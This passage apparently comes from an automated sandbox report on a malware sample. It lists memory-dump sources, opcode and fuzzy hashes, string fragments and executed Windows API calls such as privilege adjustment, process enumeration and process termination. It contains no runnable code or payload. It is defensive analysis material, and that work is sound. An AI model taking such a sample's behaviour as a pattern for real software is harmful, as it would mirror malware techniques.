                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dc9eca00e50f773017b19d06c3420276a7045771bf2c90fe3d5baf45eeb9d11e
                                  • Instruction ID: cb1a4a97d624245925707dd7ae1a32f632a5ab2c2c89a0d68af1c4514784405c
                                  • Opcode Fuzzy Hash: dc9eca00e50f773017b19d06c3420276a7045771bf2c90fe3d5baf45eeb9d11e
                                  • Instruction Fuzzy Hash: E6512A70D29249DFCF00CFA4C5816AEBBF1BF4A300F24959AD455B7201DB789A60DBA6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d66addb2e4d6ba2a1ddc5d711cb9954dd35f1017e029901dc33b1174652c7e35
                                  • Instruction ID: 1ae11e087e206bfe9319150606cbfca7f4b78b5b0dc97b44de47670806507308
                                  • Opcode Fuzzy Hash: d66addb2e4d6ba2a1ddc5d711cb9954dd35f1017e029901dc33b1174652c7e35
                                  • Instruction Fuzzy Hash: 9F51E274D2520A9FDF04CFAAC9809AEFBF2BF89300F20916AD415B7214D7349A51CF55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9911952ae06e6a2aeabcd4c3ad80318c6221e88aa6a2633348fd68b004789249
                                  • Instruction ID: 31be35c7d4c299a6b7802e3409c3167f03a526170523559653adae2416ecaf2c
                                  • Opcode Fuzzy Hash: 9911952ae06e6a2aeabcd4c3ad80318c6221e88aa6a2633348fd68b004789249
                                  • Instruction Fuzzy Hash: A1510671E006198BDB08DFAAC8405EEFBF2BF99321F24C22AD514BB255EB305911CF61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 318a9fb0a369995b15a5b28d54ffc63049497811202c0ac0f141d2a3b38c922b
                                  • Instruction ID: 76b08c24fca6f29a8721c572edb89ce117297899761bf324f645543c95d99499
                                  • Opcode Fuzzy Hash: 318a9fb0a369995b15a5b28d54ffc63049497811202c0ac0f141d2a3b38c922b
                                  • Instruction Fuzzy Hash: 654124B0D15209CFDB14CFAAC945AAEFBB6BF8A300F208169D419BB255DB349A519F40
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:

                                  Executed Functions

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117994460.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: 4v(
                                  • API String ID: 0-2431902420

                                  APIs
                                  • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 005708EB
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2118097018.0000000000570000.00000040.00000001.sdmp, Offset: 00570000, based on PE: false
                                  Similarity
                                  • API ID: AdjustPrivilegesToken
                                  • String ID:
                                  • API String ID: 2874748243-0

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117994460.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: b.
                                  • API String ID: 0-890368386

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117994460.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: (b($(b($(b($(b(
                                  • API String ID: 0-2442200876

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117994460.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: :@lq$\,($he(
                                  • API String ID: 0-599648643

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117803755.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: k(l$k(l
                                  • API String ID: 0-4029483140

                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0057076A
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2118097018.0000000000570000.00000040.00000001.sdmp, Offset: 00570000, based on PE: false
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0

                                  APIs
                                  • RegOpenKeyExW.KERNEL32(?,00000E40), ref: 0023ABD5
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117515239.000000000023A000.00000040.00000001.sdmp, Offset: 0023A000, based on PE: false
                                  Similarity
                                  • API ID: Open
                                  • String ID:
                                  • API String ID: 71445658-0

                                  APIs
                                  • RegQueryValueExW.KERNEL32(?,00000E40,E306C970,00000000,00000000,00000000,00000000), ref: 0023ACD8
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117515239.000000000023A000.00000040.00000001.sdmp, Offset: 0023A000, based on PE: false
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0

                                  APIs
                                  • TerminateProcess.KERNELBASE(?,00000E40,E306C970,00000000,00000000,00000000,00000000), ref: 00570B84
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2118097018.0000000000570000.00000040.00000001.sdmp, Offset: 00570000, based on PE: false
                                  Similarity
                                  • API ID: ProcessTerminate
                                  • String ID:
                                  • API String ID: 560597551-0

                                  APIs
                                  • SetConsoleCtrlHandler.KERNEL32(?,00000E40,?,?), ref: 0023B10E
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117515239.000000000023A000.00000040.00000001.sdmp, Offset: 0023A000, based on PE: false
                                  Similarity
                                  • API ID: ConsoleCtrlHandler
                                  • String ID:
                                  • API String ID: 1513847179-0

                                  APIs
                                  • K32EnumProcesses.KERNEL32(?,?,?), ref: 005709B2
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2118097018.0000000000570000.00000040.00000001.sdmp, Offset: 00570000, based on PE: false
                                  Similarity
                                  • API ID: EnumProcesses
                                  • String ID:
                                  • API String ID: 84517404-0

                                  APIs
                                  • DrawTextExW.USER32(?,?,?,?,?,?), ref: 00570083
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2118097018.0000000000570000.00000040.00000001.sdmp, Offset: 00570000, based on PE: false
                                  Similarity
                                  • API ID: DrawText
                                  • String ID:
                                  • API String ID: 2175133113-0
                                  • Opcode ID: a55a1ca85033d042c669152cec660df4d8f2ec55b1d4fe9baddff4acf7ab4a25
                                  • Instruction ID: f1af26ce6a1e5c55229266858cf937df72f49b45b29a8b456f927bfbc2a5e5b2
                                  • Opcode Fuzzy Hash: a55a1ca85033d042c669152cec660df4d8f2ec55b1d4fe9baddff4acf7ab4a25
                                  • Instruction Fuzzy Hash: 18214F715093849FDB22CF25DC44B52BFF4EF06310F09849AE989CB6A3D275E808DB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • LoadLibraryShim.MSCOREE(?,?,?,?), ref: 0023B4E9
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117515239.000000000023A000.00000040.00000001.sdmp, Offset: 0023A000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoadShim
                                  • String ID:
                                  • API String ID: 1475914169-0
                                  • Opcode ID: f6f39c7a5d44a6896411a9a81c6e5159667ccc7d2ebd00fa57750fa1a4ff6350
                                  • Instruction ID: aa20bc4d5b68e03be4672aed1b3185a18b901a9c668d2f1e3d8a8511f5f3a2f8
                                  • Opcode Fuzzy Hash: f6f39c7a5d44a6896411a9a81c6e5159667ccc7d2ebd00fa57750fa1a4ff6350
                                  • Instruction Fuzzy Hash: 7D2193B15093849FD722CE15DC45B62BFE8EF56710F08808AED848B253D365E818C771
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117515239.000000000023A000.00000040.00000001.sdmp, Offset: 0023A000, based on PE: false
                                  Similarity
                                  • API ID: Atom
                                  • String ID:
                                  • API String ID: 2154973765-0
                                  • Opcode ID: 92f5a6e49f07eb30b4a39c122a7bf7f3a0687821a5b5aa39dfd236d046dac3d4
                                  • Instruction ID: 06ee56b234310e5f60281b91d51475ce7d05390009e541bbb948f5470b10b4d1
                                  • Opcode Fuzzy Hash: 92f5a6e49f07eb30b4a39c122a7bf7f3a0687821a5b5aa39dfd236d046dac3d4
                                  • Instruction Fuzzy Hash: A5212E715093C49FD712CF25DC45B92BFE4EF16610F0984EAD988CF263D265A918CB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2118097018.0000000000570000.00000040.00000001.sdmp, Offset: 00570000, based on PE: false
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: 052dccd94010f6c979d5f0dff8544c8d00b1d7b888af07ee3b3c14a92157de18
                                  • Instruction ID: dc2259e52124938840b7ad83d1138c49ade019e1161dca1f57abcb513183effa
                                  • Opcode Fuzzy Hash: 052dccd94010f6c979d5f0dff8544c8d00b1d7b888af07ee3b3c14a92157de18
                                  • Instruction Fuzzy Hash: 05219D715093C09FDB238F25DC44A92BFB0EF17310F0984DBE9888F563D225A858DB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • DuplicateHandle.KERNEL32(?,?,?,?,?,?,?), ref: 0023A61A
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117515239.000000000023A000.00000040.00000001.sdmp, Offset: 0023A000, based on PE: false
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: a08c744194eb976d9bd62dccd3a282ca0c3ea5e939ed5b45a02a68f8c1b64608
                                  • Instruction ID: ab3f6a8a652b4b9a9f258dfcdb50594ad05507510dfecb7382fe4522445076e7
                                  • Opcode Fuzzy Hash: a08c744194eb976d9bd62dccd3a282ca0c3ea5e939ed5b45a02a68f8c1b64608
                                  • Instruction Fuzzy Hash: AF117271509380AFDB228F51DC44B62FFF4EF4A310F08849AED858B552D276A418DB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • TerminateProcess.KERNELBASE(?,00000E40,E306C970,00000000,00000000,00000000,00000000), ref: 00570B84
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2118097018.0000000000570000.00000040.00000001.sdmp, Offset: 00570000, based on PE: false
                                  Similarity
                                  • API ID: ProcessTerminate
                                  • String ID:
                                  • API String ID: 560597551-0
                                  • Opcode ID: 1e752e87dc7a930cf0abe55ad6214905f106abe65b94adc3844b38fe83b6f59f
                                  • Instruction ID: 555725aad5d9c068b7149009292b89620e304bbda6f3eb8c6d80b982ea394c25
                                  • Opcode Fuzzy Hash: 1e752e87dc7a930cf0abe55ad6214905f106abe65b94adc3844b38fe83b6f59f
                                  • Instruction Fuzzy Hash: F011A071501300EFFB10CF65DC85BAABBD8EF05724F14C8AAED09DB281D674AA449AB5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • SetErrorMode.KERNELBASE(?), ref: 0023A6CC
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117515239.000000000023A000.00000040.00000001.sdmp, Offset: 0023A000, based on PE: false
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  • Opcode ID: bc50a04e312b425e6bdc20a10827c0dad78656f5c2bf5e694f388e2dc32fd876
                                  • Instruction ID: 7efe89175ef72ed32d3284b2c4d88cf58fe696c2e8e3659ff3cf7a578fb159e1
                                  • Opcode Fuzzy Hash: bc50a04e312b425e6bdc20a10827c0dad78656f5c2bf5e694f388e2dc32fd876
                                  • Instruction Fuzzy Hash: 78116A7550D3C49FDB128B25CC95A52BFB4EF07220F0E80DBD9858F1A3D269A948CB72
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2118097018.0000000000570000.00000040.00000001.sdmp, Offset: 00570000, based on PE: false
                                  Similarity
                                  • API ID: DestroyWindow
                                  • String ID:
                                  • API String ID: 3375834691-0
                                  • Opcode ID: e1f7e0264dc27f37107bd30af4b2932e8ece4c1228cb6575d1351910f6962b64
                                  • Instruction ID: 3d3d4a845b4d9a658ec22d192b00de179a2776098e601a75faa1117ab10a0443
                                  • Opcode Fuzzy Hash: e1f7e0264dc27f37107bd30af4b2932e8ece4c1228cb6575d1351910f6962b64
                                  • Instruction Fuzzy Hash: 551104755097C09FD7128B25EC84B52BFB4EF03210F0880DBED848B2A3D265A908DB72
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2118097018.0000000000570000.00000040.00000001.sdmp, Offset: 00570000, based on PE: false
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: b6f1cf4a6e4ab5f10cd6e7fd352b16bd650277852835b7c1858b00832f5df24b
                                  • Instruction ID: c977c92720c40533ac33789fbea559526d71c271c9afd95cf9f58e915f6fc6a7
                                  • Opcode Fuzzy Hash: b6f1cf4a6e4ab5f10cd6e7fd352b16bd650277852835b7c1858b00832f5df24b
                                  • Instruction Fuzzy Hash: C111D0715097809FDB228F15DC49B52FFB4EF06320F08849EED894B563C266A858DB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0057076A
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2118097018.0000000000570000.00000040.00000001.sdmp, Offset: 00570000, based on PE: false
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: dd74d946d45c933a42b4e9cb3a92529ff6387700a5e319eaed26a6105afb541b
                                  • Instruction ID: c1b8c5c07ed7d7df0f4b0c0f3d41989af36b96b12bc19b56c985f43ae8ed2271
                                  • Opcode Fuzzy Hash: dd74d946d45c933a42b4e9cb3a92529ff6387700a5e319eaed26a6105afb541b
                                  • Instruction Fuzzy Hash: D2117CB1600300DFEB64CF29EC85B56FBD8EB14220F08C46ADC49CB682D671E804DA61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • DrawTextExW.USER32(?,?,?,?,?,?), ref: 00570083
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2118097018.0000000000570000.00000040.00000001.sdmp, Offset: 00570000, based on PE: false
                                  Similarity
                                  • API ID: DrawText
                                  • String ID:
                                  • API String ID: 2175133113-0
                                  • Opcode ID: ada2fd518f98b90c87d2fd8e50129688b8aefaf8d2b79db8345cc06423b2c49d
                                  • Instruction ID: cecbabc4f3e5c4b23a06e7445729d8a6fe371e5b675f6d393948761a5aa2acb7
                                  • Opcode Fuzzy Hash: ada2fd518f98b90c87d2fd8e50129688b8aefaf8d2b79db8345cc06423b2c49d
                                  • Instruction Fuzzy Hash: F7113671500704DFEB20CF65E888B62FBE4FB04720F48C4AADD498A692D275E804EA62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • K32EnumProcesses.KERNEL32(?,?,?), ref: 005709B2
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2118097018.0000000000570000.00000040.00000001.sdmp, Offset: 00570000, based on PE: false
                                  Similarity
                                  • API ID: EnumProcesses
                                  • String ID:
                                  • API String ID: 84517404-0
                                  • Opcode ID: cd7cb4d7f916f307fa2e58dc6211a615e82a7b3ef275d96fe4b8a65e12cbfffd
                                  • Instruction ID: 657d524fcefa82b73c396fa54f0e1a0ee8013a36a4b854f6c3c7c5928b840b3f
                                  • Opcode Fuzzy Hash: cd7cb4d7f916f307fa2e58dc6211a615e82a7b3ef275d96fe4b8a65e12cbfffd
                                  • Instruction Fuzzy Hash: C0115E75500244DFEB10CF65D885B56FBE4FF05320F08C4AADE498B652D671E844DB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • LoadLibraryShim.MSCOREE(?,?,?,?), ref: 0023B4E9
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117515239.000000000023A000.00000040.00000001.sdmp, Offset: 0023A000, based on PE: false
                                  Similarity
                                  • API ID: LibraryLoadShim
                                  • String ID:
                                  • API String ID: 1475914169-0
                                  • Opcode ID: 36aac409f06085f972ecbee6faee60916be2df68fc00907a7ac540462cdb4f6f
                                  • Instruction ID: 552b96c85f00e5c582c6ee8530dfcaf2fb5192e738c1048dc9b44495cecdec58
                                  • Opcode Fuzzy Hash: 36aac409f06085f972ecbee6faee60916be2df68fc00907a7ac540462cdb4f6f
                                  • Instruction Fuzzy Hash: 60019EB1610700DFEB21CF16D885B22FBE4EF14720F08809ADE498B752D371E814CA72
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • DuplicateHandle.KERNEL32(?,?,?,?,?,?,?), ref: 0023A61A
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117515239.000000000023A000.00000040.00000001.sdmp, Offset: 0023A000, based on PE: false
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: a83279f3cd3658d0608332b9a26d5834b865cd7606e89f8d403ea3f97ae5600f
                                  • Instruction ID: f28d2e01ad219aa650e5fa10e77eea9561369c5e3c62bd603ef36597d599a07d
                                  • Opcode Fuzzy Hash: a83279f3cd3658d0608332b9a26d5834b865cd7606e89f8d403ea3f97ae5600f
                                  • Instruction Fuzzy Hash: FB018B72410700DFDF218F51D845B52FFE4EF18720F0884AADE894A612C276A424DF62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117515239.000000000023A000.00000040.00000001.sdmp, Offset: 0023A000, based on PE: false
                                  Similarity
                                  • API ID: Atom
                                  • String ID:
                                  • API String ID: 2154973765-0
                                  • Opcode ID: 685d31d4355749851c2299d5b60781da07dbb5f0dd0873d15b796009862ea76d
                                  • Instruction ID: cfd9ea135f883ae2113598ceb738b095145f7e05ad90fed0ab78fdf996a9d889
                                  • Opcode Fuzzy Hash: 685d31d4355749851c2299d5b60781da07dbb5f0dd0873d15b796009862ea76d
                                  • Instruction Fuzzy Hash: 64017CB19203409FEB11DF15D8857A2FB94EF05721F0884AADE488B246D775E814CAA6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • SetConsoleCtrlHandler.KERNEL32(?,00000E40,?,?), ref: 0023B10E
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117515239.000000000023A000.00000040.00000001.sdmp, Offset: 0023A000, based on PE: false
                                  Similarity
                                  • API ID: ConsoleCtrlHandler
                                  • String ID:
                                  • API String ID: 1513847179-0
                                  • Opcode ID: 9d67e9e8288aab26e7f7193fe28db7be363d1d969335eea404dba100aebf4039
                                  • Instruction ID: 295689b32095d697a3db8c36ecca5ae70a317135f85a66c3882e655c6d79891d
                                  • Opcode Fuzzy Hash: 9d67e9e8288aab26e7f7193fe28db7be363d1d969335eea404dba100aebf4039
                                  • Instruction Fuzzy Hash: 26016271900600ABD350DF16DC46B26FBA8FB89A20F148159ED085B741D275F515CAE6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2118097018.0000000000570000.00000040.00000001.sdmp, Offset: 00570000, based on PE: false
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: f507d4984e7b7d10fd4256bd304253d8057f9106458cc4cb0e793dc34316c70c
                                  • Instruction ID: 0adf1c95f5db46caa8d24bd97f7b415fd16ef36ad0d83723055e51fd2c23ad03
                                  • Opcode Fuzzy Hash: f507d4984e7b7d10fd4256bd304253d8057f9106458cc4cb0e793dc34316c70c
                                  • Instruction Fuzzy Hash: 7B018436504B40DFEB208F19E889B66FFA0FF15320F08C49EDD494B652D675E494EB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2118097018.0000000000570000.00000040.00000001.sdmp, Offset: 00570000, based on PE: false
                                  Similarity
                                  • API ID: DestroyWindow
                                  • String ID:
                                  • API String ID: 3375834691-0
                                  • Opcode ID: 861b8a195434d31bd622e53db0001c4496d9d4db3de5ea0c43e8036d2462bcc1
                                  • Instruction ID: 8026a3db3635e584178f52ebf4a4768ca5592eb61b490d59ded8905f95759664
                                  • Opcode Fuzzy Hash: 861b8a195434d31bd622e53db0001c4496d9d4db3de5ea0c43e8036d2462bcc1
                                  • Instruction Fuzzy Hash: 4801AD35600744CBEB20CF15E885752FFE4EF05720F08C0AADD498B692D271A848EA72
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2118097018.0000000000570000.00000040.00000001.sdmp, Offset: 00570000, based on PE: false
                                  Similarity
                                  • API ID: MessagePost
                                  • String ID:
                                  • API String ID: 410705778-0
                                  • Opcode ID: 97d73992a495b5baf8ce56f34facfb5c50c58a522b016d9bcb2cccaa2f550c2e
                                  • Instruction ID: 09eb6e2c07bfb6b523090327bde742c6a888249883f649b7b1f3286581846dff
                                  • Opcode Fuzzy Hash: 97d73992a495b5baf8ce56f34facfb5c50c58a522b016d9bcb2cccaa2f550c2e
                                  • Instruction Fuzzy Hash: 2A018B32500744DFEB218F45E888B66FFE0FF19720F08C59ADD490A656D276A858EB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • SetErrorMode.KERNELBASE(?), ref: 0023A6CC
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117515239.000000000023A000.00000040.00000001.sdmp, Offset: 0023A000, based on PE: false
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  • Opcode ID: 58c438f5481bec974c432bfa1c57cd80db10c73ba3e1f487475e6bce27c6e23e
                                  • Instruction ID: 2a17fa857777b7f33094953ba7b19b81fdddbffdeaaae62ee1ec2c32772626d9
                                  • Opcode Fuzzy Hash: 58c438f5481bec974c432bfa1c57cd80db10c73ba3e1f487475e6bce27c6e23e
                                  • Instruction Fuzzy Hash: A8F0C275510740DFEF20DF05D88A761FBA4EF05721F08C0AADD494B716D2B9A854DE72
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117994460.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: b-{
                                  • API String ID: 0-1408185351
                                  • Opcode ID: ddb8565e1db9c3f78a943546f273be6244d0a08a372ee76e4f09f60becf3056c
                                  • Instruction ID: 5e25f946bf8d3855ab5a995203ea12d67d2aac2129b25fa5fbc3c9cf2fba091c
                                  • Opcode Fuzzy Hash: ddb8565e1db9c3f78a943546f273be6244d0a08a372ee76e4f09f60becf3056c
                                  • Instruction Fuzzy Hash: 9591E574E1120ACBDB04DBA4D981ADDBBF2FF89300F608269D505BB259D731AD46CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117994460.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: Li(
                                  • API String ID: 0-122410402
                                  • Opcode ID: 19108949a7f31fcb392c76e860c5528043a18ab7907d82d5946df91df7d9de27
                                  • Instruction ID: 0057fb31181861fce75204b7ddf3559445b16f40c6bd933da43efe238afd1778
                                  • Opcode Fuzzy Hash: 19108949a7f31fcb392c76e860c5528043a18ab7907d82d5946df91df7d9de27
                                  • Instruction Fuzzy Hash: 0441D374E00208EFDF08DFA5D480AEEBBB2BF88300F209465E81577261DB315995DF65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117994460.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: Li(
                                  • API String ID: 0-122410402
                                  • Opcode ID: d038b9b632a395212a9d09962e9f55259c343a398a96e852823ad504ba4b7a02
                                  • Instruction ID: fb1ec9fc24b6a5f9f710ea6ef192c2fab3d2d904ed1f672b0a506c9c8798421f
                                  • Opcode Fuzzy Hash: d038b9b632a395212a9d09962e9f55259c343a398a96e852823ad504ba4b7a02
                                  • Instruction Fuzzy Hash: FC310274E05208EFCF09DFA4D980AEDBBB2BF88300F20946AD845B72A1D7715985DF21
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CloseHandle.KERNELBASE(?), ref: 00570390
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2118097018.0000000000570000.00000040.00000001.sdmp, Offset: 00570000, based on PE: false
                                  Similarity
                                  • API ID: CloseHandle
                                  • String ID:
                                  • API String ID: 2962429428-0
                                  • Opcode ID: 8b94a8554789cbaecef1005826044460349816735061e11e4d5e0c1e96ffe712
                                  • Instruction ID: 806c00a813e82914df83473abdb38342183a944e0fb94f32608d1654ee5ed937
                                  • Opcode Fuzzy Hash: 8b94a8554789cbaecef1005826044460349816735061e11e4d5e0c1e96ffe712
                                  • Instruction Fuzzy Hash: 8F218E715093C09FD712CB25DD45B92BFB4EF13220F0984EBE9898F2A3D265A908DB71
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117994460.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: d(
                                  • API String ID: 0-4079524267
                                  • Opcode ID: df1f2f45aadc1eb73bbc9008887ffef927399e164a86d116252ed0b5b8a35585
                                  • Instruction ID: 9efa977bd6f1caf626d3b8291e7d65bf35faa6148faf704893e5515bb3c3dfd2
                                  • Opcode Fuzzy Hash: df1f2f45aadc1eb73bbc9008887ffef927399e164a86d116252ed0b5b8a35585
                                  • Instruction Fuzzy Hash: 39112178A1160ADFCB04FFB4E94999DBBB1EF40308F504168D80197269DB706E19DF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CloseHandle.KERNELBASE(?), ref: 00570390
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2118097018.0000000000570000.00000040.00000001.sdmp, Offset: 00570000, based on PE: false
                                  Similarity
                                  • API ID: CloseHandle
                                  • String ID:
                                  • API String ID: 2962429428-0
                                  • Opcode ID: 2f1cdaf45e9d21336606d0321f80295c2ee444c24ccc2e302666c9ec62075fb1
                                  • Instruction ID: e2f178c9de33ca5ba7a345f139f174e7e2166eef27c64fa0192ec3d7985d7a3d
                                  • Opcode Fuzzy Hash: 2f1cdaf45e9d21336606d0321f80295c2ee444c24ccc2e302666c9ec62075fb1
                                  • Instruction Fuzzy Hash: 1701DF71500740CFEB10CF15E885B96FFE4EF11320F08C8AADC0D8B682D271A804DA72
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117994460.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 29fba9a3efae48d66bbfd257dd66d347b2d0bd8baa05a5695c2bf24feddc0e7f
                                  • Instruction ID: b895be6a027f4ec6ddd13567eca10e77526506d7fdbaf6a9d527c28336f77ed2
                                  • Opcode Fuzzy Hash: 29fba9a3efae48d66bbfd257dd66d347b2d0bd8baa05a5695c2bf24feddc0e7f
                                  • Instruction Fuzzy Hash: C061A3B4E01208CFCB08DFA9D85499DBBF2FF89300F24806AD819AB365DB349945CF55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117994460.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1cb89620efb43056846b32fc83364a4dac5dce61c24ca4769945e298896daccb
                                  • Instruction ID: caefd0f2e956a7d63692c62d5ca0d7b12e4cc892e7389660b10e9a788cb10527
                                  • Opcode Fuzzy Hash: 1cb89620efb43056846b32fc83364a4dac5dce61c24ca4769945e298896daccb
                                  • Instruction Fuzzy Hash: 384114B5E01208DFCB04DFA9C444A9DBBF2BF89310F2491AAD819AB361E7359D41CF60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117563744.0000000000282000.00000040.00000001.sdmp, Offset: 00282000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
